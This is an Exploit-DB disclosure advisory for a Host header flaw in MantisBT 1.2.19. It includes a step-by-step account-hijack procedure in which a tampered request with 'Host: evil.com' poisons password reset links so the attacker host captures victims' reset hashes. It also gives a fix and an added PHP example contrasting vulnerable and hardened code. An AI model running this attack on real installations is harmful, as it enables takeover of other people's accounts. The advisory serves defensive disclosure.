Mantis Bug Tracker 1.2.19 - Host Header

Published: 02 Sep 2015. Reported by: Pier-Luc Maltais. Type: exploitdb. Source: www.exploit-db.com

MantisBT 1.2.19 - Host header attack vulnerability allows account hijacking

# Exploit Title: MantisBT 1.2.19 - Host header attack vulnerability
# Date: 07-09-2015
# Exploit Author: Pier-Luc Maltais
#                 Centre opérationnel de sécurité informatique gouvernemental (COSIG)
# Vendor Homepage: https://www.mantisbt.org/
# Software Link: http://sourceforge.net/projects/mantisbt/files/mantis-stable/
# Version: 1.2.19
# Contact: https://twitter.com/plmaltais
#          http://plmsecurity.net/mantis_host_header_attack

==========================
Vulnerability Description:
==========================

MantisBT 1.2.19 is vulnerable to a Host header attack that can
be exploited by an unauthenticated user to hijack another user's account.
 
==================
Technical Details:
==================

This exploit uses the Host header attack to poison the link in the
password reset e-mail. You need to know the victim's username and
e-mail address. You also need a remote host that you control to catch the
verification hash needed for the password reset.

1.  Access the password reset feature and fill the form with the
    victim username and e-mail.

    http://{VULNERABLE_MANTIS}/mantisbt/lost_pwd_page.php

2.  Using an intercepting proxy such as Burp, replace the Host header
    value with your evil host.

    Original request:

    POST /mantisbt/lost_pwd_page.php HTTP/1.1
    Host: {VULNERABLE_MANTIS}
    [...]

    Modified request:

    POST /mantisbt/lost_pwd_page.php HTTP/1.1
    Host: evil.com
    [...]
    
3.  When the user receives the e-mail, the link is poisoned with
    the evil host.

    [...]
    visit the following URL to change your password: 
    http://evil.com/mantisbt/verify.php?id=1&confirm_hash=81ece020dfcd6d53e02c5323583cdead 
    [...]
    
4.  Now, when the victim clicks on the link to reset his password,
    his verification hash is sent to our evil host. All we
    have to do is access the verify.php page with his hash, so
    we can change his password and hijack his account.
    
    http://{VULNERABLE_MANTIS}/mantisbt/verify.php?id=1&confirm_hash=81ece020dfcd6d53e02c5323583cdead 
 
=========
Solution:
=========

Use $_SERVER['SERVER_NAME'] (server controlled) instead of
$_SERVER['HTTP_HOST'] (client controlled).
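The vulnerable pattern the advisory describes beside a hardened form, as an added example that is not MantisBT's own code: the fix keeps the link host out of the request entirely by reading it from configuration and rejects requests whose Host header is not on an allowlist, which also makes poisoning attempts visible in the logs. Note that on Apache with the default UseCanonicalName Off, SERVER_NAME is itself derived from the client's Host header, so a configured canonical URL is the safer choice. The helper names, the config constants and the request values are assumptions constructed for the example.

```php
<?php
// Added example (hypothetical helpers, not MantisBT code). Both functions take the
// $_SERVER array explicitly so the behaviour can be exercised offline.

// Vulnerable: the link host is copied from the client-controlled Host header, so a
// request carrying "Host: evil.com" poisons the reset link that gets e-mailed.
function build_reset_url_vulnerable(array $server, int $id, string $hash): string {
    return 'http://' . $server['HTTP_HOST']
         . '/mantisbt/verify.php?id=' . $id . '&confirm_hash=' . $hash;
}

// Assumed deployment settings; in a real install these would live in the config file.
const CANONICAL_BASE_URL = 'https://tracker.example.org/mantisbt';
const ALLOWED_HOSTS = ['tracker.example.org'];

// Hardened: the link is always built from the configured base URL, and any request
// whose Host header is not on the allowlist is refused and logged.
function build_reset_url_hardened(array $server, int $id, string $hash): string {
    // Strip an optional ":port" suffix before comparing against the allowlist.
    $requestHost = strtolower(explode(':', $server['HTTP_HOST'] ?? '')[0]);
    if (!in_array($requestHost, ALLOWED_HOSTS, true)) {
        error_log("Rejected password reset request with unexpected Host header: $requestHost");
        throw new RuntimeException('Unexpected Host header');
    }
    return CANONICAL_BASE_URL . '/verify.php?id=' . rawurlencode((string) $id)
         . '&confirm_hash=' . rawurlencode($hash);
}

// Constructed request mirroring the advisory's "Modified request" (placeholder hash).
$tampered = ['HTTP_HOST' => 'evil.com', 'SERVER_NAME' => 'tracker.example.org'];
$hash = 'PLACEHOLDER_HASH';

echo build_reset_url_vulnerable($tampered, 1, $hash), "\n";   // link points at evil.com

try {
    echo build_reset_url_hardened($tampered, 1, $hash), "\n";
} catch (RuntimeException $e) {
    echo 'blocked: ', $e->getMessage(), "\n";                 // tampered request refused
}
```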
 
====================
Disclosure Timeline:
====================

16/02/2015 - Found the vulnerability
17/02/2015 - Wrote this advisory
17/02/2015 - Contacted developers on MantisBT forum
18/02/2015 - Opened an issue in the bug tracker
01/09/2015 - Still not patched, releasing this advisory.
 
===========
References:
===========

[1] http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html
[2] http://stackoverflow.com/questions/2297403/http-host-vs-server-name/2297421#2297421
